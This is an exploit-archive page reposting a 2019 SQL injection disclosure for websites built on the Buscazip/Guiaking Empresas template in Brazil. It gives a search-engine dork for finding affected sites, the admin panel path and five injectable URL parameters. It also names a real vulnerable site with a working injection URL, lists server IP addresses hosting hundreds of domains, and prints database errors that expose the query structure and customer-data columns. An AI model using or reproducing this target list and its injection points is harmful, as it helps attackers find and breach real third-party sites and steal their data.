Advertisement






Site Desenvolvido Por Buscazip Guiaking Empresas Brazil SQL Injection

CVE Category Price Severity
CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown Unknown Remote 2019-04-17
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040156

Below is a copy:

Site Desenvolvido Por Buscazip Guiaking Empresas Brazil SQL Injection
####################################################################

# Exploit Title : Site Desenvolvido Por Buscazip Guiaking Empresas Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/04/2019
# Vendor Homepages : buscazip.com.br - guiaking.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Site desenvolvido por Buscazip, Guiaking Empresas
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Site Desenvolvido Por Buscazip Guiaking Empresas is prone to an SQL-injection vulnerability 

because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 

Exploiting this issue could allow an attacker to compromise the application, access or 

modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application 

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser or using any SQL Injector Tool.

####################################################################

# Admin Panel Login Path :
************************
/admin/

# SQL Injection Exploit :
**********************
/imovel.php?id=[SQL Injection]

/noticias.php?c=[SQL Injection]

/noticia.php?id=[SQL Injection]

/foto.php?id=[SQL Injection]

/video.php?id=[SQL Injection]

####################################################################

# Example Vulnerable Sites :
************************
[+] ariquemes190.com.br/imovel.php?id=22%27

Vulnerable IP Address => (185.201.10.86) => There are 81 domains hosted on this server.

Vulnerable IP Address => (185.201.11.217) => There are 281 domains hosted on this server.

####################################################################

# SQL Database Error :
*********************
Database Error
Message:MySQL Query fail: SELECT a.id, a.codigo, a.nome, a.cidade, a.categoria, a.preco, 
a.parcela, a.preco_parcela, a.desc_parcela, a.finalidade, a.ocupacao, a.areaultil, a.areatotal, 
a.quartos, a.suites, a.garagem, a.endereco, a.bairro, a.descricao, b.id_imagem, b.id_imagem, 
b.imagem, d.id_cliente, d.nome AS vendedor, d.telefone, d.celular, d.email, d.site, d.cidade 
as cidade_vendedor FROM imovel a LEFT JOIN cliente d ON d.id_cliente = a.id_cliente 
LEFT JOIN imagem b ON b.id_produto = a.codigo WHERE a.status = 'Ativo' AND 
d.status = 'Ativo' AND a.id='22''MySQL Error: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax 
to use near ''22''' at line 6
Script:/imovel.php?id=22%27

Database Error
Message:MySQL Query fail: SELECT id, data_ordem, titulo FROM videos WHERE 
status='Ativo' AND id != '182'' ORDER BY data_ordem DESC LIMIT 10
MySQL Error: You have an error in your SQL syntax; check the manual that 
corresponds to your MariaDB server version for the right syntax to use near ''182'' 
ORDER BY data_ordem DESC LIMIT 10' at line 2

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum